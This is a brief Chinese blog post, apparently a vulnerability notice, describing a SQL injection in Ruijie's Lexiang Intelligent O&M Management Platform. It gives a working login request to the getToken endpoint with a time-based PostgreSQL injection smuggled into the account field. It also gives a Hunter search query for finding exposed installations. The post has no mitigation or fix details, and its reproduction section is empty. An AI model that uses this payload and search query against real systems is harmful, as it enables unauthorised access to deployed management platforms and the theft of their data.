Babing
Published on 2024-08-30 / 3 Visits
0
0

B15-1北京星网锐捷网络技术有限公司-乐享智能运维管理平台-SQL

B15-1北京星网锐捷网络技术有限公司-乐享智能运维管理平台-SQL

漏洞描述:

POST /auth-ui/v1/api/user/token/getToken HTTP/1.1

account=admin');SELECT PG_SLEEP(5)–&password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957

Hunter语法:

hunter:title=“乐享智能运维管理平台”

漏洞复现:

payload:


Comment